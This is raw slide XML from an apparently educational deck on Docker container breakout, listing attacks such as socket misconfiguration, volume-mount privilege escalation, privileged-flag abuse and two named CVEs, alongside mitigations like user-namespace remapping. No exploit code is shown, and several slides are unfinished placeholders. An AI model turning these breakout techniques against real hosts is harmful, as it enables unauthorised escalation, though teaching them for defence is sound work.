                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Save it and restart the docker daemon by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> restart docker”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> command.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E57E50-F626-C046-01EE-EEFA6B3D9C1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64B52164-2CEA-76B9-865F-D4006FB84DDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50178" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9228E737-0AF5-46BA-8991-91F20D8F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3275807"/>
            <a:ext cx="45212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74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5593-AA7B-05A2-1567-E57D654CBAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B249376-AD02-AA32-828C-869F6F413730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To Verify, check if user “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dockremap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> created in the system </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E57E50-F626-C046-01EE-EEFA6B3D9C1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64B52164-2CEA-76B9-865F-D4006FB84DDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52226" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEDEFCFC-D980-75C3-5671-4663D4875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274" y="2578100"/>
            <a:ext cx="7251700" cy="850900"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2722E329-C6EF-9957-0D32-DEA874660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766" y="3557093"/>
            <a:ext cx="42037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07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5593-AA7B-05A2-1567-E57D654CBAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B249376-AD02-AA32-828C-869F6F413730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reproduce the attack and verify the mitigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The root inside the container is mapped to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>non-privileged user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> in the host machine. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E57E50-F626-C046-01EE-EEFA6B3D9C16}"/>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64B52164-2CEA-76B9-865F-D4006FB84DDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54274" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{076BAC88-4388-1588-4C73-099A10537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2278120"/>
            <a:ext cx="72771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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE8A9E32-9661-C5E3-995E-9BB2FA888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4890153"/>
            <a:ext cx="7239000" cy="11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83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a:xfrm>
            <a:off x="838200" y="197037"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Outline</a:t>
            </a:r>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838200" y="1248352"/>
            <a:ext cx="10515600" cy="4855602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400"/>
              <a:t>Container </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Breakout</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="2000"/>
              <a:t>Examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Patching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="90000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Monitoring Application: Key Ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Monitoring Application: Architecture Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Examples of Analyzing Breakout Vulnerabilities</a:t>
            </a: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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61727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1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="3200"/>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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1891040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Container escape using the exposed socket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r>
              <a:rPr lang="en-SA" sz="3200"/>
              <a:t>In this attack .....</a:t>
            </a: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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172276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Container escape using the exposed socket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r>
              <a:rPr lang="en-SA" sz="3200"/>
              <a:t>To mitigate: ....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA" sz="3200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA" sz="3200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA" sz="3200"/>
          </a:p>
          <a:p>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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400303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Container escape using the exposed socket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r>
              <a:rPr lang="en-SA" sz="3200"/>
              <a:t>Verify the mitigation by reproduce the attack and check the outputs.........</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA" sz="3200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA" sz="3200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA" sz="3200"/>
          </a:p>
          <a:p>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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292320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1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg1">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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1413840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422F-EDEF-A19D-CDB3-6B4C878D154F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
